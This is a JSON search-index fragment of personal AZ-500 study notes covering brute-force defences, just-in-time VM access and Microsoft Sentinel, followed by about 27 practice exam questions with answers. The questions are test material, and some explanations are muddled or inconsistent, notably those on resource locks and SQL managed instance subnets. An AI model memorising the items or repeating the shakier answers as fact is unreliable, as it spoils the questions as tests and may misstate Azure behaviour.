          • Deny\u00a0- From within the recommendation details page, you can prevent new resources from being created with this issue.

        Which recommendations are included in the secure score calculations?

        • Only built-in recommendations have an impact on the secure score.
        • Recommendations flagged as Preview aren't included in the calculations of your secure score. They should still be remediated wherever possible so that when the preview period ends, they'll contribute towards your score.
        • Preview recommendations are marked with:\u00a0
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#211-brute-force-attacks","title":"2.11. Brute force attacks","text":"

        To counteract brute-force attacks, you can take multiple measures such as:

        • Disable the public IP address and use one of these connection methods:

          • Use a point-to-site virtual private network (VPN)
          • Create a site-to-site VPN
          • Use Azure ExpressRoute to create secure links from your on-premises network to Azure.
          • Require two-factor authentication
        • Increase password length and complexity

        • Limit login attempts

        • Implement Captcha

          • About CAPTCHAs\u00a0- Any time you let people register on your site or even enter a name and URL (like for a blog comment), you might get a flood of fake names. These are often left by automated programs (bots) that try to leave URLs on every website they can find. (A common motivation is to post the URLs of products for sale.) You can help make sure that a user is a real person and not a computer program by using a\u00a0CAPTCHA\u00a0to validate users when they register or otherwise enter their name and site.
          • CAPTCHA stands for\u00a0Completely Automated Public Turing test to tell Computers and Humans Apart. A CAPTCHA is a\u00a0challenge-response\u00a0test in which the user is asked to do something that is easy for a person to do but hard for an automated program to do. The most common type of CAPTCHA is one where you see distorted letters and are asked to type them. (The distortion is supposed to make it hard for bots to decipher the letters.)
          • Limit the amount of time that the ports are open.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#just-in-time-vm-access","title":"Just-in-time VM access","text":"

        Threat actors actively hunt accessible machines with open management ports, like\u00a0remote desktop protocol (RDP)\u00a0or\u00a0secure shell protocol (SSH). All of your virtual machines are potential targets for an attack. When a VM is successfully compromised, it's used as the entry point to attack further resources within your environment.

        The diagram shows the logic Defender for Cloud applies when deciding how to categorize your supported VM. When Defender for Cloud finds a machine that can benefit from JIT, it adds that machine to the recommendation's Unhealthy resources tab.

        Just-in-time (JIT) virtual machine (VM) access is used to lock down inbound traffic to your Azure VMs, reducing exposure to attacks while providing easy access to connect to VMs when needed. When you enable JIT VM Access for your VMs, you next create a policy that determines the ports to help protect, how long ports should remain open, and the approved IP addresses that can access these ports. The policy helps you stay in control of what users can do when they request access. Requests are logged in the Azure activity log, so you can easily monitor and audit access. The policy will also help you quickly identify the existing VMs that have JIT VM Access enabled and the VMs where JIT VM Access is recommended.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#3-configure-and-monitor-microsoft-sentinel","title":"3. Configure and monitor Microsoft Sentinel","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#31-what-is-microsoft-sentinel","title":"3.1. What is Microsoft Sentinel","text":"

        Microsoft Sentinel is a scalable, cloud-native, security information event management (SIEM) and security orchestration automated response (SOAR) solution. Microsoft Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for alert detection, threat visibility, proactive hunting, and threat response.

        Think of Microsoft Sentinel as the first\u00a0SIEM-as-a-service\u00a0that brings the power of the cloud and artificial intelligence to help security operations teams efficiently identify and stop cyber-attacks before they cause harm.

        Microsoft Sentinel integrates with Microsoft 365 solution and correlates millions of signals from different products such as: - Azure Identity Protection, - Microsoft Cloud App Security, - and soon Azure Advanced Threat Protection, Windows Advanced Threat Protection, M365 Advanced Threat Protection, Intune, and Azure Information Protection.

        It enables the following services:

        It enables the following services:

        • Collect data at cloud scale\u00a0across all users, devices, applications, and infrastructure, both on-premises and in multiple clouds.
        • Detect previously undetected threats, and minimize false positives using Microsoft's analytics and unparalleled threat intelligence.
        • Investigate threats with artificial intelligence, and hunt for suspicious activities at scale, tapping into years of cyber security work at Microsoft.
        • Respond to incidents rapidly\u00a0with built-in orchestration and automation of common tasks.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#configure-data-connections-to-sentinel","title":"Configure data connections to Sentinel","text":"

        To onboard Microsoft Sentinel, these are the global prerequisites:

        • Active Azure Subscription
        • Log Analytics workspace.
        • To enable Microsoft Sentinel, you need contributor permissions to the subscription in which the Microsoft Sentinel workspace resides.
        • To use Microsoft Sentinel, you need either contributor or reader permissions on the resource group that the workspace belongs to.
        • Additional permissions may be needed to connect specific data sources.
        • Microsoft Sentinel is a paid service.

        Having those, to onboard Microsoft Sentinel, you first need to connect to your security sources.

        Microsoft Sentinel comes with a number of connectors for Microsoft solutions, and additionally there are built-in connectors to the broader security ecosystem for non-Microsoft solutions. You can also use common event format, Syslog or REST-API to connect your data sources with Microsoft Sentinel as well.

        The following data connection methods are supported by Microsoft Sentinel:

        • Service to service integration: Some services are connected natively, such as AWS and Microsoft services, these services leverage the Azure foundation for out-of-the-box integration, the following solutions can be connected in a few clicks:
        • Amazon Web Services - CloudTrail
        • Azure Activity
        • Microsoft Entra audit logs and sign-ins
        • Microsoft Entra ID Protection
        • Azure Advanced Threat Protection
        • Azure Information Protection
        • Microsoft Defender for Cloud
        • Cloud App Security
        • Domain name server
        • Microsoft 365
        • Microsoft Defender ATP
        • Microsoft web application firewall
        • Windows firewall
        • Windows security events

        External solutions

        • API: Some data sources are connected using APIs that are provided by the connected data source. Typically, most security technologies provide a set of APIs through which event logs can be retrieved. The APIs connect to Microsoft Sentinel and gather specific data types and send them to Azure Log Analytics
        • Agent: The Microsoft Sentinel agent, which is based on the Log Analytics agent, converts CEF formatted logs into a format that can be ingested by Log Analytics. Depending on the appliance type, the agent is installed either directly on the appliance, or on a dedicated Linux server. To connect your external appliance to Microsoft Sentinel, the agent must be deployed on a dedicated machine (VM or on-premises) to support the communication between the appliance and Microsoft Sentinel. You can deploy the agent automatically or manually. Automatic deployment is only available if your dedicated machine is a new VM you are creating in Azure. Alternatively, you can deploy the agent manually on an existing Azure VM, on a VM in another cloud, or on an on-premises machine.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#32-create-workbooks-to-monitor-sentinel-data","title":"3.2. Create workbooks to monitor Sentinel data","text":"

        After onboarding to Microsoft Sentinel, monitor your data using the Azure Monitor workbooks integration.

        After you connect your data sources to Microsoft Sentinel, you can monitor the data using the Microsoft Sentinel integration with Azure Monitor Workbooks, which provides versatility in creating custom workbooks. While Workbooks are displayed differently in Microsoft Sentinel, it may be helpful for you to determine how to create interactive reports with Azure Monitor Workbooks. Microsoft Sentinel allows you to create custom workbooks across your data and comes with built-in workbook templates to quickly gain insights across your data as soon as you connect a data source.

        Workbooks are intended for\u00a0Security operations center (SOC)\u00a0engineers and analysts of all tiers to visualize data. Workbooks are best used for high-level views of Microsoft Sentinel data and don't require coding knowledge.

        You can't integrate workbooks with external data.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#33-enable-rules-to-create-incidents","title":"3.3. Enable rules to create incidents","text":"

        To help you reduce noise and minimize the number of alerts you have to review and investigate, Microsoft Sentinel uses analytics to correlate alerts into incidents.

        Incidents are groups of related alerts that indicate an actionable possible threat you can investigate and resolve.

        You can use the built-in correlation rules as-is or as a starting point to build your own.

        Microsoft Sentinel also provides machine learning rules to map your network behavior and then look for anomalies across your resources.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#34-configure-playbooks","title":"3.4. Configure playbooks","text":"

        Automate your common tasks and simplify security orchestration with playbooks that integrate with Azure services and your existing tools.

        To build playbooks with Azure Logic Apps, you can choose from a growing gallery of built-in playbooks. These include 200 or more connectors for services such as Azure functions. The connectors allow you to apply any custom logic in code like:

        • ServiceNow
        • Jira
        • Zendesk
        • HTTP requests
        • Microsoft Teams
        • Slack
        • Microsoft Entra ID
        • Microsoft Defender for Endpoint
        • Microsoft Defender for Cloud Apps

        For example, if you use the ServiceNow ticketing system, use Azure Logic Apps to automate your workflows and open a ticket in ServiceNow each time a particular alert or incident is generated.

        Playbooks are intended for\u00a0Security operations center (SOC)\u00a0engineers and analysts of all tiers to\u00a0automate\u00a0and\u00a0simplify tasks,\u00a0including data ingestion,\u00a0enrichment,\u00a0investigation, and\u00a0remediation. Playbooks work best with single, repeatable tasks and don't require coding knowledge. Playbooks aren't suitable for ad-hoc or complex task chains or for documenting and sharing evidence.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#35-hunt-and-investigate-potential-breaches","title":"3.5. Hunt and investigate potential breaches","text":"

        Microsoft Sentinel deep investigation tools help you to understand the scope and find the root cause of a potential security threat.

        Interactive graph. - You can choose an entity on the interactive graph to ask interesting questions for a specific entity and drill down into that entity and its connections to get to the root cause of the threat.

        Built-in queries. - Use Microsoft Sentinel's powerful hunting search-and-query tools, based on the MITRE framework, which enable you to proactively hunt for security threats across your organization\u2019s data sources before an alert is triggered. While hunting, create bookmarks to return to interesting events later. Use a bookmark to share an event with others or group events with other correlating events to create a compelling incident for investigation.

        Microsoft Sentinel supports Jupyter notebooks in Azure Machine Learning workspaces, including full machine learning, visualization, and data analysis libraries:

        • Perform analytics that isn't built into Microsoft Sentinel, such as some Python machine learning features.
        • Create data visualizations that aren't built into Microsoft Sentinel, such as custom timelines and process trees.
        • Integrate data sources outside of Microsoft Sentinel, such as an on-premises data set.

        Notebooks are intended for threat hunters or Tier 2-3 analysts, incident investigators, data scientists, and security researchers. They require a higher learning curve and coding knowledge. They have limited automation support.

        Notebooks in Microsoft Sentinel provide:

        • Queries to both Microsoft Sentinel and external data
        • Features for data enrichment, investigation, visualization, hunting, machine learning, and big data analytics

        Notebooks are best for:

        • More complex chains of repeatable tasks
        • Ad-hoc procedural controls
        • Machine learning and custom analysis

        Notebooks support rich Python libraries for manipulating and visualizing data. They're useful for documenting and sharing analysis evidence.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-exams/","title":"My 100 selected questions to warm up for the AZ-500 certificate","text":"

        These questions form the hard core of my question bank. They originate from various sources, including Udemy, Microsoft's free practice assessments, and YouTube videos. Successfully completing these questions does not guarantee approval for the AZ-500 exam, but it does provide a good indicator of where you stand up.

        Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-1","title":"Question 1","text":"

        You have custom alert rules in Microsoft Sentinel. The rules exceed the query length limitations. You need to resolve the issue. Which function should you use for the rule? Select only one answer.

        • ADX functions
        • Azure functions with a timer trigger
        • stored procedures
        • user-defined functions
        See response

        You can use user-defined functions to overcome the query length limitation. Timer trigger runs in a scheduled manner (pull, not push). Using ADX functions to create Azure Data Explorer queries inside the Log Analytics query window is unsupported. Stored procedures are unsupported by Azure Data Explorer.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-2","title":"Question 2","text":"

        You have an Azure Kubernetes Service (AKS) cluster named AKS1. You are configuring network isolation for AKS1. You need to limit which IP addresses can access the Kubernetes control plane. What should you do? Select only one answer.

        • Configure API server authorized IP ranges.
        • Configure Azure Front Door.
        • Customize CoreDNS for AKS.
        • Implement Open Service Mesh AKS add-on.
        See response

        The \"Open Service Mesh AKS add-on\" is designed to enhance communication and control between services within an Azure Kubernetes Service (AKS) cluster, offering features like service discovery, load balancing, and observability. However, it is not directly related to the task of limiting IP addresses that can access the Kubernetes control plane. Configuring API server authorized IP ranges is the correct approach for controlling access to the control plane by specifying which IP addresses or IP ranges are allowed to interact with the Kubernetes API server. The Open Service Mesh AKS add-on addresses a different aspect of AKS management, focusing on service-to-service communication, making it less relevant for the specific task of network isolation and control of the Kubernetes control plane. Azure Front Door is a global service for routing and load balancing traffic. It is not designed for controlling access to the Kubernetes control plane. Front Door is used for directing and optimizing the delivery of web applications, and it doesn't offer the fine-grained control needed to limit access to the Kubernetes API server. CoreDNS is a DNS server used within Kubernetes clusters for service discovery. While CoreDNS can play a role in the internal DNS resolution within the cluster, it is not a tool for restricting access to the Kubernetes control plane. Customizing CoreDNS is generally related to DNS resolution configurations and would not address the task of limiting IP addresses that can access the control plane.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-3","title":"Question 3","text":"

        Your company has an Azure subscription and an Amazon Web Services (AWS) account. You plan to deploy Kubernetes to AWS. You need to ensure that you can use Azure Monitor Container insights to monitor container workload performance. What should you deploy first? Select only one answer.

        • AKS Engine
        • Azure Arc-enabled Kubernetes
        • Azure Container Instances
        • Azure Kubernetes Service (AKS)
        • Azure Stack HCI
        See response

        Azure Arc-enabled Kubernetes is the only configuration that includes Kubernetes and can be deployed to AWS.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-4","title":"Question 4","text":"

        You have an Azure subscription that contains a virtual machine named VM1. VM1 is configured with just-in-time (JIT) VM access. You need to request access to VM1. Which PowerShell cmdlet should you run? Select only one answer.

        • Add-AzNetworkSecurityRuleConfig
        • Get-AzJitNetworkAccessPolicy
        • Set-AzJitNetworkAccessPolicy
        • Start-AzJitNetworkAccessPolicy
        See response

        The\u00a0start-AzJitNetworkAccesspolicy\u00a0PowerShell cmdlet is used to request access to a JIT-enabled virtual machine.\u00a0Set-AzJitNetworkAccessPolicy\u00a0is used to enable JIT on a virtual machine.\u00a0Get-AzJitNetworkAccessPolicy\u00a0and\u00a0Add-AzNetworkSecurityRuleConfig\u00a0are not used to start a request access. Start-AzJitNetworkAccessPolicy is used to initiate the JIT access request. When you run this cmdlet, you're essentially requesting access to a VM for a specific period, during which your access will be allowed through specific network security group (NSG) rules. These rules are temporarily modified to grant access only during the JIT access window you've requested. After the specified time window expires, the NSG rules revert to their previous state, thereby revoking the temporary access.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-5","title":"Question 5","text":"

        You have an Azure subscription. You plan to use the\u00a0az aks create\u00a0command to deploy an Azure Kubernetes Service (AKS) cluster named AKS1 that has Azure AD integration. You need to ensure that local accounts cannot be used on AKS1. Which flag should you use with the command? Select only one answer.

        • disable-local-accounts
        • generate-ssh-keys
        • kubelet-config
        • windows-admin-username
        See response

        When deploying an AKS cluster, local accounts are enabled by default. Even when enabling RBAC or Azure AD integration, --admin access still exists essentially as a non-auditable backdoor option. To disable local accounts on an AKS cluster, you should use the\u00a0--disable-local-accounts\u00a0flag with the\u00a0az aks create\u00a0command. The remaining options do not remove local accounts.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-6","title":"Question 6","text":"

        You need to enable encryption at rest by using customer-managed keys (CMKs). Which two services support CMKs? Each correct answer presents a complete solution. Select all answers that apply.

        • Azure Blob storage
        • Azure Disk Storage
        • Azure Files
        • Azure NetApp Files
        • Log Analytics workspace
        See response

        Azure Files and Azure Blob Storage

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-7","title":"Question 7","text":"

        You implement dynamic data masking for an Azure Synapse Analytics workspace. You need to provide only a user named User1 with the ability to see the data. What should you do? Select only one answer.

        • Create a Conditional Access policy for Azure SQL Database, and then grant access.
        • Grant the UNMASK permission to User1.
        • Use the\u00a0ALTER TABLE\u00a0statement to drop the masking function.
        • Use the\u00a0ALTER TABLE\u00a0statement to edit the masking function.
        See response

        Granting the UNMASK permission to User1 removes the mask from User1 only. Creating a Conditional Access policy for Azure SQL Database, and then granting access is not enough for User1 to see the data, only to sign in. Using the\u00a0ALTER TABLE\u00a0statement to edit the masking function affects all users. Using the\u00a0ALTER TABLE\u00a0statement to drop the masking function removes the mask altogether.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-8","title":"Question 8","text":"

        You need to provide public anonymous access to a file in an Azure Storage account. The solution must follow the principle of least privilege. Which two actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

        • For the container, set Public access level to\u00a0Blob.
        • For the container, set Public access level to\u00a0Container.
        • For the storage account, set Blob public access to\u00a0Disabled.
        • For the storage account, set Blob public access to\u00a0Enabled.
        See response

        Unless prevented by another setting, setting Public access level to\u00a0Blob\u00a0allows public access to the blob only. Setting Blob public access to\u00a0Enabled\u00a0is a prerequisite for setting the access level of container or blob. Setting Blob public access to\u00a0Disabled\u00a0prevents any public access and setting Public access level to\u00a0Container\u00a0also allows any current and future blobs in the container, which does not follow the principle of least privilege.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-9","title":"Question 9","text":"

        You have an application that will securely share files hosted in Azure Blob storage to external users. The external users will not use Azure AD to authenticate. You plan to share more than 1,000 files. You need to restrict access to only a single IP address for each file. What should you do? Select only one answer.

        • Configure a storage account firewall.
        • Generate a service SAS that include the signedIP field.
        • Set the Allow public anonymous access to setting for the storage account.
        • Set the Secure transfer required setting for the storage account.
        See response

        Using the Generate a service SAS that include the signedIP field allows a SAS to be generated by using an account key, and each SAS can be configured with an allowed IP address. Configuring the storage account firewall does not allow for more than 200 IP address rules. Setting the Allow public anonymous access to setting for the storage account does not prevent access by an IP address. Setting the Secure transfer required property for the storage account prevents HTTP access, but it does not limit where the access request originates from.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-10","title":"Question 10","text":"

        You have an Azure virtual machine named VM1 the runs Windows Server 2022. A programmer is writing code to run on VM1. The code will use the system-assigned managed identity assigned to VM1 to access Azure resources. Which endpoint should the programmer use to request the authentication token required to access the Azure resources?

        • Azure AD v1.0.
        • Azure AD v2.0.
        • Azure Resources Manager.
        • Azure Instance Metadata Service.
        See response

        Azure Instance Metadata Service is a REST endpoint accessible to all IaaS virtual machines created via Azure Resource Manager (ARM). The endpoint is available at a well-known non-routable IP address (169.254.169.254) that can be accessed only from the virtual machines. The endpoint is used to request the authentication token required to gain access to the Azure resources. Azure AD v1.0 and Azure AD v2.0 endpoints are used to authenticate work and school accounts, not managed identities. The ARM endpoint is where the authentication token is sent by the code once it is obtained from the Azure Instance Metadata Service.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-11","title":"Question 11","text":"

        **You are managing permission scopes for an Azure AD app registration. What are three OpenID Connect scopes that you can use? Each correct answer presents a complete solution. **

        • email
        • openID
        • phone
        • offline_access
        See response

        The openID scope appears on the work account consent page as the Sign you in permission. The email scope gives the app access to a user's primary email address in the form of the email claim. The offline_access scope gives your app access to resources on behalf of a user for an extended time. On the consent page, this scope appears as the Maintain access to data you have given it access to permission.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-12","title":"Question 12","text":"

        You have a resource group named RG1 that contains an Azure virtual machine named VM1. A user named User1 is assigned the Contributor role for RG1. You need to prevent User1 from modifying the properties of VM1. What should you do?

        • Add a deny assignment for\u00a0Microsoft.Compute/virtualMachines/*\u00a0in the VM1 scope. -
        • Apply a read-only lock to the RG1 scope.
        See response

        A read-only lock on a resource group that contains a virtual machine prevents all users from starting or restarting the virtual machine. The RBAC assignment is set at the resource group level and inherited by the resource. The assignment needs to be edited at the original scope (level). You cannot directly create your own deny assignments. Assigning User1 the Virtual Machine User Login role in the RG1 scope will still allow User1 to have access as a contributor to restart VM1. While you can create custom roles with specific permissions and assign those roles to users, Azure RBAC does not provide a direct mechanism for creating \"deny\" assignments, which would explicitly prevent users from performing specific actions. In other words, you can't explicitly deny a user or group certain permissions at the resource level using RBAC. To achieve fine-grained control over resource access, Azure generally focuses on granting permissions via role assignments and ensuring that users have only the necessary privileges for their tasks. If you want to restrict access, you typically grant a less permissive role or apply resource locks (such as a read-only lock, which prevents modifications) rather than creating deny assignments, which are not a standard part of Azure RBAC.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-13","title":"Question 13","text":"

        **You have an Azure subscription that contains an Azure AD tenant and an Azure web app named App1. A user named User1 needs permission to manage App1. The solution must follow the principle of least privilege. Which role should you assign to User1? **

        • Cloud Application Administrator \u2013 Since App1 is an app in Azure, this role provides administrative permissions to App1 and follows the principle of least privilege.
        • Application Administrator \u2013 This role provides administrative permissions to App1 but also provides additional permissions to the app proxy for on-premises applications.
        • Cloud App Security Administrator \u2013 This role is specific to the Microsoft Defender for Cloud Apps solution.
        • Application Developer \u2013 This role allows the user to create registrations but not manage applications.
        See response

        Correct: Cloud Application Administrator \u2013 Since App1 is an app in Azure, this role provides administrative permissions to App1 and follows the principle of least privilege. Incorrect: Application Administrator \u2013 This role provides administrative permissions to App1 but also provides additional permissions to the app proxy for on-premises applications. Incorrect: Cloud App Security Administrator \u2013 This role is specific to the Microsoft Defender for Cloud Apps solution. Incorrect: Application Developer \u2013 This role allows the user to create registrations but not manage applications.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-14","title":"Question 14","text":"

        You have an Azure subscription that contains a virtual machine named VM1 and a storage account named storage1. You need to ensure that VM1 can access storage1 over the Azure backbone network. What should you implement?

        • Service endpoints
        • Private endpoints
        • A subnet
        • A VPN gateway
        See response

        Service endpoints route the traffic inside of Azure backbone, allowing access to the entire service, for example, all Microsoft SQL servers or the storage accounts of all customers. Private endpoints provide access to a specific instance. A subnet does not allow isolation or route traffic to the Azure backbone. A VPN gateway does not allow traffic isolation to all resources.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-15","title":"Question 15","text":"

        You have an Azure subscription that contains a virtual network named VNet1. VNet1 contains the following subnets:

        • Subnet1: Has a connected virtual machine
        • Subnet2: Has a\u00a0Microsoft.Storage\u00a0service endpoint
        • Subnet3: Has subnet delegation to the\u00a0Microsoft.Web/serverFarms\u00a0service
        • Subnet: Has no additional configurations

        You need to deploy an Azure SQL managed instance named managed1 to VNet1. To which subnets can you connect managed1?

        • Subnet 2 and Subset 4
        • Subnet2, Subnet3, and Subnet4 only
        • Subnet 1, Subnet2, Subnet3, and Subnet4
        See response

        Azure SQL managed instances require a dedicated subnet without other resources or virtual machines connected to it. This is because managed instances have specific networking and isolation requirements, and sharing a subnet with other resources, like the virtual machine in Subnet1, could lead to conflicts in network configurations. Therefore, to deploy \"managed1,\" you should select a subnet that doesn't have any other resources connected to it, such as Subnet2, Subnet3, or a new dedicated subnet within VNet1.You can deploy an SQL managed instance to a dedicated virtual network subnet that does not have any resource connected. The subnet can have a service endpoint or can be delegated for a different service. For this scenario, you can deploy managed1 to Subnet2, Subnet3, and Subnet4 only. You cannot deploy managed1 to Subnet1 because Subnet1 has a connected virtual machine.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-16","title":"Question 16","text":"

        You host a web app on an Azure virtual machine. Users access the app through a public load balancer. You need to offload SSL traffic to the web app at the edge. What should you do?

        • Configure Traffic Manager.
        • Configure Azure Application Gateway.
        • Configure Azure Front Door and switch access to the app via an internal load balancer.
        • Configure Azure Firewall.
        See response

        Front Door allows for SSL offloading at the edge and can route traffic to an internal load balancer. Traffic Manager does not to perform SSL offloading. Neither Azure Firewall nor an Application Gateway can be deployed at the edge. Azure Application Gateway: While Azure Application Gateway is a Layer 7 load balancer that can provide SSL termination and load balancing for web applications, it is not positioned at the network edge like Azure Front Door. Application Gateway is typically used for routing traffic within a virtual network to backend services. It can offload SSL traffic, but it's more for managing traffic within the Azure infrastructure, and it does not provide the same level of global load balancing and edge routing capabilities as Azure Front Door.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-17","title":"Question 17","text":"

        You have an Azure subscription that contains a virtual network named VNet1. You plan to deploy an Azure App Service web app named Web1. You need to be able to deploy Web1 to the subnet of VNet1. The solution must minimize costs. Which pricing plan should you use for Web1?

        • Basic
        • Shared
        • Isolated
        • Premium
        See response

        Only the Isolated pricing plan (tier) can be deployed to a virtual network subnet. With other pricing plans, inbound traffic is always routed to the public IP address of the web app, while web app outbound traffic can reach the endpoints on a virtual network.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-18","title":"Question 18","text":"

        You have a data connector for Microsoft Sentinel. You need to configure the connector to collect logs from Conditional Access in Azure AD. Which log should you connect to Microsoft Sentinel?

        • Sign-in logs
        • Audit logs
        • Activity logs
        • Provisioning logs
        See response

        Sign-in logs include information about sign-ins and how resources are used by your users. Audit logs include information about changes applied to your tenant, such as user and group management or updates applied to your tenant\u2019s resources. Activity logs include subscription-level events, not tenant-level activity. Provisioning logs include activities performed by the provisioning service, such as the creation of a group in ServiceNow or a user imported from Workday.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-19","title":"Question 19","text":"

        You have an Azure Storage account. You plan to prevent the use of shared keys by using Azure Policy. Which two access methods will continue to work? Each correct answer presents a complete solution. Select all answers that apply.

        • SAS account SAS
        • service SAS
        • Storage Blob Data Reader role
        • user delegation
        See response

        user delegation and Storage Blob Data Reader role.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-20","title":"Question 20","text":"

        You have an Azure SQL Database server. You enable Azure AD authentication for Azure SQL. You need to prevent other authentication methods from being used. Which command should you run? Select only one answer.

        • az sql mi ad-admin create
        • az sql mi ad-only-auth enable
        • az sql server ad-admin create
        • az sql server ad-only-auth enable
        See response

        az sql server ad-only-auth enable\u00a0enables authentication only through Azure AD.\u00a0az sql server ad-admin create\u00a0and\u00a0az sql mi ad-admin create\u00a0do not stop other authentication methods.\u00a0az sql mi ad-only-auth enable\u00a0enables Azure AD-only authentication for Azure SQL Managed Instance, not Microsoft SQL Server.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-21","title":"Question 21","text":"

        You have an application that securely shares files hosted in Azure Blob storage to external users by using an account SAS. One of the SAS tokens is compromised. How should you stop the compromised SAS token from being used? Select only one answer.

        • Regenerate the storage account access keys.
        • Set the Allow public anonymous access to setting for the storage account.
        • Set the Secure transfer required property for the storage account.
        • Switch to managed identities.
        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-22","title":"Question 22","text":"

        You have an Azure AD tenant. Users have both Windows and non-Windows devices. All users have smart phones. You plan to implement Azure AD Multi-Factor Authentication (MFA). You need to ensure that Azure MFA is used to authenticate users to Azure resources. The solution must be implemented without any additional cost. Which three Azure MFA method should you implement? Each correct answer presents a complete solution. Select all answers that apply.

        • FIDO2 security keys
        • OATH software tokens
        • SMS verification
        • the Microsoft Authenticator app
        • voice call verification
        • Windows Hello for Business
        See response

        SMS verification, The Microsoft Authenticator app, and voice call verification.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-23","title":"Question 23","text":"

        You are managing permission scopes for an Azure AD app registration. What are three OpenID Connect scopes that you can use? Each correct answer presents a complete solution. Select all answers that apply.

        • address
        • email
        • offline_access
        • openID
        • phone
        See response

        email, openID, offline_access.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-24","title":"Question 24","text":"

        You have an Azure subscription that contains a user named Admin1. You need to ensure that Admin1 can access the Regulatory compliance dashboard in Microsoft Defender for Cloud. The solution must follow the principle of least privilege. Which two roles should you assign to Admin1? Each correct answer presents part of the solution. Select all answers that apply.

        • Global Reader
        • Resource Policy Contributor
        • Security Admin
        • Security Reader
        See response

        To use the Regulatory compliance dashboard in Defender for Cloud, you must have sufficient permissions. At a minimum, you must be assigned the Resource Policy Contributor and Security Admin roles.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-25","title":"Question 25","text":"

        Your company has a multi-cloud online environment. You plan to use Microsoft Defender for Cloud to protect all supported online environments. Which three environments support Defender for Cloud? Each correct answer presents a complete solution. Select all answers that apply.

        • Alibaba Cloud
        • Amazon Web Services (AWS)
        • Azure DevOps
        • GitHub
        • Oracle Cloud
        See response

        Defender for Cloud protects workloads in Azure, AWS, GitHub, and Azure DevOps. Oracle Cloud and Alibaba Cloud are unsupported by Defender for Cloud.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-26","title":"Question 26","text":"

        You have Azure SQL databases that contain credit card information. You need to identify and label columns that contain credit card numbers. Which Microsoft Defender for Cloud feature should you use? Select only one answer.

        • hash reputation analysis
        • inventory filters
        • SQL information protection
        • SQL Servers on machines
        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-27","title":"Question 27","text":"

        You configure Microsoft Sentinel to connect to different data sources. You are unable to configure a connector that uses an Azure Functions API connection. Which permissions should you change? Select only one answer.

        • read and write permissions for Azure Functions
        • read and write permissions for the workspaces used by Microsoft Sentinel
        • read permissions for Azure Functions
        • read permissions for the workspaces used by Microsoft Sentinel
        See response

